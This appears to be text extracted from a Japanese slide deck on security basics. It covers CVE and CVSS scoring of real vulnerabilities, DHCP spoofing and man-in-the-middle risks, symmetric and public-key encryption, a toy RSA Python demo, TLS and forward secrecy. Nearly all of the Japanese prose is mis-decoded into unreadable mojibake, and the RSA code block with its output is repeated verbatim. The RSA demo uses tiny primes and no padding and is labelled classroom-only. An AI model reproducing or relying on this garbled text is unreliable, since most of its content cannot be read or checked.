  124. Common Vulnerabilities and Exposures
    apacheͰݕࡧΛ͔͚ͯΈͨͱ͜Ζ
    http://www.cve.mitre.org/cve/search_cve_list.html
    ͜͜ʹ
    CVEͷWebαΠτͰapacheͰݕࡧΛ͔͚ͨͱ͜ΖΛషΔ


  125. ͜͜ʹ
    CVEͷNISTʹΑΔղઆΛషΔ
    Common Vulnerabilities and Exposures
    "QBDIFIUUQEͷIUBDDFTTʹ-JNJUΛઃఆ͍ͯ͠Δ৔߹ʹ
    ϦϞʔτ͔Βݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏Մೳੑ͕͋Δ੬ऑੑ
    Use after free੬ऑੑͰ͋Γ
    ඞͣ͠΋ݟ͑ͯ͸͍͚ͳ͍৘ใ͕ૹΒΕΔ༁Ͱ͸ͳ͍
    https://nvd.nist.gov/vuln/detail/CVE-2017-9798


  126. Common Vulnerability Scoring System
    https://nvd.nist.gov/vuln/detail/CVE-2017-9798
    ڞ௨੬ऑੑධՁγεςϜ(ུͯ͠CVSS)
    ੬ऑੑͷϠό͞Λ਺஋ʹͨ͠΋ͷ
    ͜ΕΛݟΕ͹੬ऑੑͷ࢓૊Έ͕Θ͔Βͳͯ͘΋
    Ͳͷ͘Β͍·͍ͣࣄʹͳ͍ͬͯΔ͔͕Θ͔Δ
    ͜͜ʹ
    CVEͷCVSSΛషΔ


  127. Common Vulnerability Scoring System
    جຊධՁج४(Base Metrics)
    ੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ
    ͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ
    ݱঢ়ධՁج४ (Temporal Metrics)
    ੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
    ͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ
    ؀ڥධՁج४(Environmental Metrics)
    ੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
    ͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ


  128. Common Vulnerability Scoring System
    جຊධՁج४(Base Metrics)
    ੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ
    ͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ
    ݱঢ়ධՁج४ (Temporal Metrics)
    ੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
    ͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ
    ؀ڥධՁج४(Environmental Metrics)
    ੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
    ͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ
    ͜͜ʹ
    CVEͷCVSSΛషΔ
    ࣌ͱ৔ॴʹґΒͳ͍جຊධՁج४ͷείΞ͕
    ੬ऑੑ৘ใͱͯ͠ެ։͞Ε͍ͯΔ


  129. جຊධՁج४ (Base Metrics)
    ߈ܸݩ۠෼(Access Vector)
    ߈ܸऀ͸Ͳ͔͜Β߈ܸΛߦ͏ඞཁ͕͋Δ͔
    ϩʔΧϧ ಉҰηάϝϯτ ωοτϫʔΫͷͲ͔͜ΒͰ΋

    ߈ܸ৚݅ͷෳࡶ͞(Access Complexity)
    ߈ܸͰ͖Δঢ়ଶʹ͢Δͷ͸೉͍͔͠
    ಛผͳઃఆ͕࢖ΘΕͯΔ͚࣌ͩ ࣄલʹԿ͔Λ஌͍ͬͯΔඞཁ͕͋Δ

    ඞཁͳಛݖϨϕϧ(Privileges Required)
    ߈ܸΛߦ͏ʹ͸Ͳͷఔ౓ͷݖݶ͕ඞཁ͔
    ҰൠϢʔβݖݶ͕ඞཁ ؅ཧऀݖݶ͕ඞཁ


  130. جຊධՁج४ (Base Metrics)
    Ϣʔβؔ༩Ϩϕϧ(User Interaction)
    ߈ܸΛ੒ཱͤ͞ΔͨΊʹਖ਼نͷϢʔβʹԿ͔Λͤ͞Δඞཁ͕͋Δ͔
    ࡉ޻Λͨ͠Webϖʔδ��։͔ͤΔඞཁ͕͋Δ

    είʔϓ(Scope)
    ߈ܸΛड͚ͨίϯϙʔωϯτҎ֎΁ͷ߈ܸͷ଍͕͔Γʹ͞ΕΔՄೳੑ͕͋Δ͔
    ΫϩεαΠτεΫϦϓςΟϯάͳͲ͕͜Εʹ֘౰͢Δ


  131. جຊධՁج४ (Base Metrics)
    ׬શੑ΁ͷӨڹ(Integrity Impact)
    ߈ܸऀ͸ର৅ͷ৘ใΛվ᜵Ͱ͖Δ͔
    վ᜵Ͱ͖Δ৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ

    Մ༻ੑ΁ͷӨڹ(Availability Impact)
    ߈ܸऀ͸αʔϏεΛఀࢭͤ͞Δࣄ͕Ͱ͖Δ͔
    Ұ෦ͷػೳΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ ׬શʹఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ

    ػີੑ΁ͷӨڹ(Confidentiality Impact)
    ߈ܸऀʹݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏͔
    ݟ͑ͯ͠·͏৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ


  132. ͜͜ʹ
    CVEͷCVSSΛషΔ
    Apache httpdͷ੬ऑੑCVE-2017-9798ͷ৔߹
    ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ
    ߈ܸ͸؆୯
    ߈ܸʹݖݶ͸ಛʹඞཁͳ͠
    ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠
    Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍
    ػີ৘ใ͕࿙ΕΔ
    ৘ใͷվ͟Μ͸Ͱ͖ͳ͍
    Մ༻ੑΛଛͶΔ͜ͱ͸Ͱ͖ͳ͍
    ۓٸ౓: 7.5/10.0 (ߴ)
    ݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏
    https://nvd.nist.gov/vuln/detail/CVE-2017-9798


  133. ͜͜ʹ
    CVEͷCVSSΛషΔ
    BINDͷ੬ऑੑCVE-2016-2776ͷ৔߹
    ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ
    ߈ܸ͸؆୯
    ߈ܸʹݖݶ͸ಛʹඞཁͳ͠
    ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠
    Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍
    ৘ใ͸࿙Εͳ͍
    ৘ใͷվ͟Μ͸Ͱ͖ͳ͍
    Մ༻ੑΛ׬શʹଛͶΔࣄ͕Ͱ͖Δ
    ۓٸ౓: 7.5/10.0 (ߴ)
    ݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏
    https://nvd.nist.gov/vuln/detail/CVE-2016-2776


  134. ͜͜ʹ
    CVEͷCVSSΛషΔ
    Firefoxͷ੬ऑੑCVE-2016-5253ͷ৔߹
    ϩʔΧϧ͔Β߈ܸͰ͖Δ
    ߈ܸ͸؆୯Ͱ͸ͳ͍
    ҰൠϢʔβݖݶ͕ཁΔ
    ϢʔβʹԿ͔ͤ͞Δඞཁ͸ͳ͠
    Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍
    ৘ใ͸࿙Εͳ͍
    ػີ৘ใͷվ͟Μ͕Ͱ͖Δ
    Մ༻ੑΛଛͶΔࣄ͸Ͱ͖ͳ͍
    ۓٸ౓: 4.7/10.0 (த)
    ੬ऑੑʹ͸ҧ͍ͳ͍͚ͲϠό͍΍ͭͰ͸ͳͦ͞͏
    https://nvd.nist.gov/vuln/detail/CVE-2016-5253


  135. ͜͜ʹ
    redhatͷ੬ऑੑ৘ใͷϖʔδΛషΔ
    ۓٸ౓ͷߴ͍੬ऑੑ͕ݟ͔ͭΔͱ֤σΟετϦϏϡʔγϣϯ͔Β
    Ͳ͏͢Ε͹࠹͛Δ͔ʹؔ͢Δ৘ใ͕ग़Δ
    https://access.redhat.com/security/cve/cve-2016-2776 https://security-tracker.debian.org/tracker/CVE-2016-2776
    ͜͜ʹ
    debianͷ੬ऑੑ৘ใͷϖʔδΛషΔ


  136. ࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑʹCVE ID͕ৼΒΕͨ
    ͦͷIDʹ͍ͭͯৄࡉ͕ग़͍ͯͳ͍͔άάΖ͏
    ࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑͷৄࡉ͕ग़͍ͯͨ
    CVSSΛݟͯӨڹΛධՁ͠Α͏
    σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ͳ͔ͳ͔ग़ͳ͍
    ੬ऑੑͷৄࡉΛݟͯ
    ໰୊ͷػೳΛආ͚ͯαʔϏεΛఏڙͰ͖ͳ͍͔ݕ౼͠Α͏
    σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ग़ͨ
    ૣٸʹΞοϓσʔτ͠Α͏


  137. ௨৴ʹର͢Δ߈ܸʹඋ͑Δ


  138. WiFi
    Πϯλʔωοτ ઀ଓઌ
    ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢
    Alice


  139. WiFi
    Πϯλʔωοτ ઀ଓઌ
    ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢
    ֎ʹग़Δʹ͸
    Ͳ͜ʹ௨৴Λ౤͛Ε͹
    ྑ͍Ͱ͔͢
    ͦΕ͸
    DHCP DISCOVER
    ѱҙ͋Δୈࡾऀ
    ͬͪͩ͜Α
    DHCP OFFER
    Alice


  140. WiFi
    Πϯλʔωοτ ઀ଓઌ
    ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢
    ѱҙ͋Δୈࡾऀ
    σʔλͷྲྀΕ
    ͜ͷΑ͏ͳ߈ܸ͸DHCPεϓʔϑΟϯάͱݺ͹ΕΔ
    Alice


  141. ѱҙ͋Δୈࡾऀ͕ؒʹڬ·Δํ๏͸͍͔ͭ͋͘Δ͕
    ઀ଓઌ͔Β͜͏ͨ͠ঢ়ଶΛະવʹ๷͙ज़͸ແ͍ͨΊ
    ΠϯλʔωοτΛհͨ͠௨৴͸
    ؒʹѱҙ͋Δୈࡾऀ͕͍Δ΋ͷͱͯ͠
    ௨৴Λߦ͏ඞཁ͕͋Δ


  142. Πϯλʔωοτ͸఻ݴήʔϜͩ
    ԕ͘ͷϗετʹͨͲΓணͨ͘Ίʹ͸
    ͨ͘͞ΜͷϗετΛܦ༝͢ΔՄೳੑ͕͋Δ
    ઀ଓઌ
    ܦ༝ͨ͠ϗετͷ਺Λhop਺ͱݺͿ
    1hop 2hop 3hop 4hop 5hop


  143. Πϯλʔωοτ͸఻ݴήʔϜͩ
    ௨৴ܦ࿏্ʹ͋Δશͯͷϗετʹ͸
    ௨৴಺༰ؙ͕ݟ͑Ͱ͋Δ
    ઀ଓઌ


  144. Πϯλʔωοτ͸఻ݴήʔϜͩ
    ௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸
    ࣍ͷϗετʹਖ਼͘͠௨৴಺༰Λ఻͑ͳ͍͔΋͠Εͳ͍
    ઀ଓઌ


  145. Πϯλʔωοτ͸఻ݴήʔϜͩ
    ௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸
    ຊདྷͷ௨৴૬खʹͳΓ͢·͔͢΋͠Εͳ͍
    Bob
    Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢
    Charlie
    Alice


  146. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
    ӨڹΛड͚ͳ͍ͨΊʹ͸
    ௨৴಺༰Λ҉߸Խ
    ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ


  147. ڞ௨伴҉߸
    H e l l o , sp W o r l d ! nl
    48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
    m 8 can dc1 si vt n 9 n del : syn M f R +
    ed 38 98 11 8f 0b 6e 39 6e ff ba 16 4d e6 52 2b
    H e l l o , sp W o r l d ! nl
    48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
    伴Λ࢖ͬͯม׵
    伴Λ࢖ͬͯٯม׵
    ͲͷΑ͏ʹม׵͢Δ͔ʹҧ͍͕͋Δ
    ෳ਺ͷ҉߸ΞϧΰϦζϜ͕ଘࡏ͢Δ


  148. ྑ͍ڞ௨伴҉߸ͱ͸
    ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ
    શͯͷ伴Λࢼ͢ΑΓޮ཰ͷྑ͍ղಡํ๏͕ଘࡏ͠ͳ͍
    ͜ΕΛূ໌͢Δͷ͕ࠔ೉
    ͜Ε͸伴Λ௕͘͢Ε͹࣮ݱͰ͖Δ


  149. ΞϧΰϦζϜ͕޿͘ར༻͞Ε͍ͯͯ
    ͦΕͰ΋ޮ཰ͷྑ͍ղಡํ๏͕ൃݟ͞Ε͍ͯͳ͍҉߸͸
    গͳ͘ͱ΋ࠓͷͱ͜Ζ͸҆શͰ͋Δͱߟ͑ΒΕΔ
    ҉߸ΞϧΰϦζϜΛࣗ࡞͢Δͱ
    ͜ͷ෦෼Λຬͨ͢ͷ͕ࠔ೉ʹͳΔ
    ∴҉߸ΞϧΰϦζϜͷࣗ࡞͸ΦεεϝͰ͖ͳ͍
    ্هͷ৚݅Λຬͨ͢
    طଘͷ҉߸ΞϧΰϦζϜΛ࠾༻͠Α͏


  150. ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ
    ޿͘ར༻͞Ε͍ͯΔ͚Ͳ
    ޮ཰ͷྑ͍ղಡํ๏͕ݟ͔͍ͭͬͯͳ͍ڞ௨伴҉߸
    Advanced Encryption Standard (AES)
    Blowfish
    ͳͲͳͲ
    ϒϩοΫ҉߸
    ετϦʔϜ҉߸
    Chacha20


  151. ڞ௨伴҉߸ͷ伴഑ૹ໰୊
    ҉߸Λ΍ΓऔΓ͢ΔͨΊʹ͸伴͕ඞཁ
    ͔͠͠҉߸Խͱ෮߸ʹಉ͡伴Λ࢖͍ͬͯΔ৔߹
    ౪ௌͷՄೳੑ͕͋Δ௨৴खஈΛ࢖ͬͯ૬खʹ伴Λ౉ͤͳ͍
    ѱҙ͋Δୈࡾऀʹ伴͕όϨ͍ͯͨΒ
    ҉߸ͷҙຯ͕ͳ͍ Bob
    Alice


  152. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
    ӨڹΛड͚ͳ͍ͨΊʹ͸
    ௨৴಺༰Λ҉߸Խ
    ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
    ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗
    NEW!


  153. ެ։伴҉߸
    ୭͔͕ެ։伴Λ౪ௌ͍ͯͨ͠ͱͯ͠΋
    ͦͷ伴Ͱ௨৴಺༰Λ෮߸͢Δ͜ͱ͸Ͱ͖ͳ͍
    ෮߸͢Δͷʹඞཁͳ
    ൿີ伴
    ͸ଞਓʹڭ͑ͳ͍
    ҉߸Խͱ෮߸ʹҟͳΔ伴Λ࢖͏҉߸ΞϧΰϦζϜ
    ҉߸Խʹඞཁͳ
    ެ։伴
    Λ௨৴૬खʹૹΔ
    ௨৴૬ख͸ެ։伴Λ࢖ͬͯ
    伴ͷओʹૹΓ͍ͨϝοηʔδΛ҉߸Խ͢Δ


  154. ެ։伴҉߸
    =15
    =-15 =42
    =57
    42+15=57
    57-15=42
    ͜Μͳ҉߸ͩͱ
    ҰॠͰެ։伴͔Βൿີ伴͕όϨͯ͠·͏
    ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
    ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍


  155. RSA
    ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
    ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍
    373*61=22753Ͱ͋Δ͜ͱ͸؆୯ʹٻ·Δ͕
    22753͕373ͱ61ʹ෼ղͰ͖Δ͜ͱΛ
    ಉ͘͡Β͍؆୯ʹٻΊΔํ๏͸஌ΒΕ͍ͯͳ͍
    ૉҼ਺෼ղ͕ඞཁ
    ͜ͷΑ͏ʹܭࢉྔ͕ରশͰͳ͍ܭࢉΛڬΜͰ伴Λ࡞Δ͜ͱͰ
    ެ։伴͔Βൿີ伴Λ࡞Ζ͏ͱ͢Δͱ
    ๲େͳܭࢉ͕ඞཁʹͳΔΑ͏ͳ伴Λ࡞ΕΔ


  156. #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    def egcd( x, y, a = 0, b = 1 ):
        """Extended-Euclid helper used by modinv().

        Walks the division chain x, y, x mod y, ... while carrying a
        coefficient along, and returns (gcd, coefficient) once the remainder
        reaches zero; the coefficient satisfies x * coefficient == gcd (mod y).
        Iterative form of the same recursion; y == 0 still raises
        ZeroDivisionError, exactly as the recursive version did.
        """
        while True:
            div, mod = divmod( x, y )
            if mod == 0:
                return ( y, a )
            # the same rebinding the recursive call performed on each step
            x, y, a, b = y, mod, b - div * a, a
    def modinv( x, y ):
        """Return the inverse of x modulo y, in [0, y).

        The extended-Euclid chain is inlined here: it yields (gcd, coefficient)
        with x * coefficient == gcd (mod y).
        Raises Exception('no modinv') when gcd(x, y) != 1, i.e. no inverse exists.
        """
        r0, r1, coef, prev = x, y, 0, 1
        while True:
            q, r = divmod( r0, r1 )
            if r == 0:
                break
            r0, r1, coef, prev = r1, r, prev - q * coef, coef
        # r1 is now gcd(x, y); only a unit has an inverse
        if r1 != 1:
            raise Exception( 'no modinv')
        return coef % y
    def generate_key_pair():
        """Build a toy RSA key pair from three fixed primes.

        Returns (public_key, private_key): public_key is the list [n, e] with
        n = p * q, and private_key is e^-1 mod (p-1)(q-1) as computed by
        modinv(). Raises Exception('no modinv') via modinv() if e and
        (p-1)(q-1) are not coprime. Demo only: a modulus this small is
        trivially factorable and must never be used for real keys.
        """
        p, q, e = 116903, 215443, 139721
        modulus = p * q
        totient = ( p - 1 ) * ( q - 1 )
        private_key = modinv( e, totient )
        return ( [ modulus, e ], private_key )
    # Demo run: derive a key pair, encrypt a fixed plaintext, decrypt it back.
    public_key, private_key = generate_key_pair()
    print( 'ൿີ伴:\t%d' % private_key )
    print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
    # The plaintext is the ASCII bytes "hoge" read as one integer. Both
    # directions are raw modular exponentiation with no padding, which is
    # another reason this stays a classroom example.
    plain = 0x686f6765
    crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
    decrypted = pow( crypted, private_key, public_key[ 0 ] )
    print( 'ݪจ:\t%X' % plain )
    print( '҉߸Խ:\t%X' % crypted )
    print( '෮߸:\t%X' % decrypted )
    $ ./crypto.py
    ൿີ伴: 15753325457
    ެ։伴: 25185933029,139721
    ݪจ: 686F6765
    ҉߸Խ: 2779B8996
    ෮߸: 686F6765
    RSA


    def egcd( x, y, a = 0, b = 1 ):
        """Extended-Euclid helper used by modinv().

        Walks the division chain x, y, x mod y, ... while carrying a
        coefficient along, and returns (gcd, coefficient) once the remainder
        reaches zero; the coefficient satisfies x * coefficient == gcd (mod y).
        Iterative form of the same recursion; y == 0 still raises
        ZeroDivisionError, exactly as the recursive version did.
        """
        while True:
            div, mod = divmod( x, y )
            if mod == 0:
                return ( y, a )
            # the same rebinding the recursive call performed on each step
            x, y, a, b = y, mod, b - div * a, a
    def modinv( x, y ):
        """Return the inverse of x modulo y, in [0, y).

        The extended-Euclid chain is inlined here: it yields (gcd, coefficient)
        with x * coefficient == gcd (mod y).
        Raises Exception('no modinv') when gcd(x, y) != 1, i.e. no inverse exists.
        """
        r0, r1, coef, prev = x, y, 0, 1
        while True:
            q, r = divmod( r0, r1 )
            if r == 0:
                break
            r0, r1, coef, prev = r1, r, prev - q * coef, coef
        # r1 is now gcd(x, y); only a unit has an inverse
        if r1 != 1:
            raise Exception( 'no modinv')
        return coef % y
    def generate_key_pair():
        """Build a toy RSA key pair from three fixed primes.

        Returns (public_key, private_key): public_key is the list [n, e] with
        n = p * q, and private_key is e^-1 mod (p-1)(q-1) as computed by
        modinv(). Raises Exception('no modinv') via modinv() if e and
        (p-1)(q-1) are not coprime. Demo only: a modulus this small is
        trivially factorable and must never be used for real keys.
        """
        p, q, e = 116903, 215443, 139721
        modulus = p * q
        totient = ( p - 1 ) * ( q - 1 )
        private_key = modinv( e, totient )
        return ( [ modulus, e ], private_key )
    # Demo run: derive a key pair, encrypt a fixed plaintext, decrypt it back.
    public_key, private_key = generate_key_pair()
    print( 'ൿີ伴:\t%d' % private_key )
    print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
    # The plaintext is the ASCII bytes "hoge" read as one integer. Both
    # directions are raw modular exponentiation with no padding, which is
    # another reason this stays a classroom example.
    plain = 0x686f6765
    crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
    decrypted = pow( crypted, private_key, public_key[ 0 ] )
    print( 'ݪจ:\t%X' % plain )
    print( '҉߸Խ:\t%X' % crypted )
    print( '෮߸:\t%X' % decrypted )
    $ ./crypto.py
    ൿີ伴: 15753325457
    ެ։伴: 25185933029,139721
    ݪจ: 686F6765
    ҉߸Խ: 2779B8996
    ෮߸: 686F6765
    RSA
    ͋Δ੔਺nͱૉͳ1Ҏ্nະຬͷ
    ࣗવ਺ͷ਺ΛٻΊΔؔ਺Λ
    ΦΠϥʔͷτʔγΣϯτؔ਺φ(n)ͱݺͿ
    ૉ਺ͷఆٛΑΓn͕ૉ਺ͷ৔߹φ(n)͸n-1ʹͳΔ
    φ(ab)=φ(a)φ(b)ʹͳΔ͜ͱ͕஌ΒΕ͍ͯΔ
    aͱbΛ஌͍ͬͯΔͱφ(ab)͸ఆ਺࣌ؒͰٻ·Δ͕
    ab͔͠Θ͔Βͳ͍৔߹φ(ab)͸ࢦ਺࣌ؒΛཁ͢Δ
    ͜ͷඇରশੑΛ࢖ͬͯެ։伴͔Βൿີ伴ΛٻΊΔͷΛࠔ೉ʹ͢Δ


  158. ެ։伴ΛૉҼ਺෼ղ͢Ε͹ൿີ伴ʹͨͲΓண͚Δ
    ༰қͰ͸ͳ͍͕
    ૯౰ͨΓͰ伴Λ୳͢ΑΓ͸୹࣌ؒͰߦ͑ͯ͠·͏


  159. ૉҼ਺෼ղ͸େ͖ͳ਺ʹͳΔఔܭࢉʹ͕͔͔࣌ؒΔ
    ݱ࣮తͳ࣌ؒͰܭࢉͰ͖ͳ͍Α͏ͳେ͖ͳ਺Λ伴ͱ͢Δ͜ͱͰ
    ൿີ伴͕όϨΔͷΛ๷͙
    RSAͷ৔߹伴௕768bitҎԼͷ΋ͷ͸
    ݱ࣮తͳ࣌ؒͰൿີ伴͕ٻ·ͬͯ͠·͏ࣄ͕஌ΒΕ͍ͯΔ
    ͜ͷΑ͏ͳݹ͍伴͸ΑΓ௕͍伴ʹߋ৽͠ͳ͚Ε͹ͳΒͳ͍
    ެ։伴҉߸ͷ伴௕͸ૉҼ਺෼ղʹ͔͔Δ࣌ؒͰܾΊΔ


  160. Bob
    Charlie
    தؒऀ߈ܸ
    ѱҙ͋Δୈࡾऀͱ҆શʹ௨৴Ͱ͖ΔΑ͏ʹͳͬͯ͠·ͬͨ!
    Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢
    ௨৴૬ख͕ຊ෺Ͱ͋Δ͜ͱΛ͔֬Ίͳ͚Ε͹ͳΒͳ͍


  161. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
    ӨڹΛड͚ͳ͍ͨΊʹ͸
    ௨৴಺༰Λ҉߸Խ
    ௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ
    ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
    ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗
    NEW!


  162. Bob
    ೝূہ
    BobຊਓͰ͋Δ͜ͱΛ
    ෺ཧతͳํ๏Ͱ֬ೝͯ͠
    ൿີ伴Λൃߦ
    ެ։伴Λऔಘ
    αʔόূ໌ॻ
    ެ։伴Λ࢖ͬͯ҉߸Խͨ͠σʔλ͸
    ຊ෺ͷBob͚͕ͩಡΊΔ
    ԿΒ͔ͷཧ༝ͰBobͷൿີ伴͕
    ଞਓͷखʹ౉ͬͯ͠·ͬͨ৔߹
    ೝূہ͸ͦͷ伴Λࣦޮͤ͞Δ


  163. Transport Layer Security
    ུͯ͠TLS ੲ͸SSLͱݺ͹Ε͍ͯͨ
    ͜ΕΒͷػೳΛ࣋ͬͨ௨৴࿏Λ࡞ΔͨΊͷن֨
    RFCͰඪ४Խ[1]͞Ε͓ͯΓOpenSSLͳͲͷ࣮૷͕ଘࡏ͢Δ
    ࣌୅ͱͱ΋ʹ҆શͳ҉߸͸มΘΔͨΊTLS͸༷ʑͳ҉߸ٕज़Λαϙʔτ͍ͯ͠Δ
    [1] https://www.ietf.org/rfc/rfc5246.txt
    ௨৴಺༰Λ҉߸Խ
    ௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ
    ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
    ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗


  164. Transport Layer Security
    ෺ཧ૚
    σʔλϦϯΫ૚
    TCP/IP
    ௨৴Λߦ͏ΞϓϦέʔγϣϯ
    TLS
    TLSΛ࢖͏ΞϓϦέʔγϣϯ͸
    TLSʹ௨৴σʔλΛ౉͢
    TLS͸௨৴૬खͷ֬ೝɺ伴ڞ༗Λߦ͍
    ҉߸Խͯ͠ϋογϡΛ͚ͭͨσʔλΛ
    TCP/IPͷιέοτʹྲྀ͢
    TLSͷ্ʹΞϓϦέʔγϣϯΛ࡞ΔࣄͰ
    ҉߸ʹؔ͢Δ໘౗ࣄΛ
    ࣗ෼Ͱ࣮૷͢Δඞཁ͕ͳ͘ͳΔ


  165. RSAΛ༻͍ͨTLS
    ެ։伴Λऔಘ
    nΛެ։伴Ͱ҉߸Խͯ͠౉͢
    ͋Δཚ਺nΛ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ڞ௨伴҉߸Ͱ
    ҉߸Խ͞Εͨ௨৴
    ༗ޮͳެ։伴Ͱ҉߸Խͨ͠஋Λ྆ऀͰڞ༗Ͱ͖ͨͱ͍͏͜ͱ͸
    ڞ௨伴͸ҙਤͨ͠௨৴૬खͷΈͱڞ༗͞Εͨঢ়ଶʹ͋Δ
    ຊ෺ͷ௨৴૬ख͸
    ൿີ伴Ͱ
    nΛऔΓग़ͤΔ
    Bob
    Alice


  166. RSAΛ༻͍ͨTLS
    औಘ
    nΛެ։伴Ͱ҉߸Խͯ͠౉͢
    ͋Δཚ਺nΛ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ڞ௨伴҉߸Ͱ
    ҉߸Խ͞Εͨ௨৴
    ͜ͷ࣌ͷ௨৴Λه࿥͍ͯ͠Δୈࡾऀ͕͍ͨͱ͢Δ
    ͜ͷ࣌఺Ͱ͸ڞ௨伴҉߸ͷ伴΋ൿີ伴΋Θ͔Βͳ͍ͨΊ
    ୈࡾऀ͸௨৴ͷ಺༰Λ஌Δ͜ͱ͕Ͱ͖ͳ͍
    Bob
    Alice


  167. nΛެ։伴Ͱ҉߸Խͯ͠౉͢
    ͋Δཚ਺nΛ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ڞ௨伴҉߸Ͱ
    ҉߸Խ͞Εͨ௨৴
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ
    ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β
    ڞ௨伴ΛऔΓग़ͯ͠
    શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ


  168. nΛެ։伴Ͱ҉߸Խͯ͠౉͢
    ͋Δཚ਺nΛ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ڞ௨伴҉߸Ͱ
    ҉߸Խ͞Εͨ௨৴
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ϑΥϫʔυηΩϡϦςΟ
    ௨৴͕ߦΘΕͨޙͰαʔόূ໌ॻͷൿີ伴͕όϨͯ΋
    ͦΕ·ͰʹߦΘΕͨ௨৴಺༰͕όϨͳ͍Α͏ʹ͢Δ͜ͱ
    RSAͰڞ༗伴ͷૉΛ௨৴૬खʹૹΔͱ
    ϑΥϫʔυηΩϡϦςΟΛ࣮ݱͰ͖ͳ͍
    ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ
